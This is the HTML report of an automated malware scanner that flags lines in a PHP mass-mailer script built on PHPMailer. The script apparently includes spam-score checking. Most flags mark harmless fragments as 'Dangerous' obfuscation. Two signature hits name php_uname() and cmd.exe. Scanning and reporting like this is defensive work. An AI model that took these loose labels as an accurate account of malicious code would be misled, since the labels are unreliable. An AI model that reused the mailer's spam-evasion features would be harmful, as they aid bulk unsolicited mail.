<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4075</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$text</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4242</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4267</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4278</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4287</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4298</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4300</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">all_recipients</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
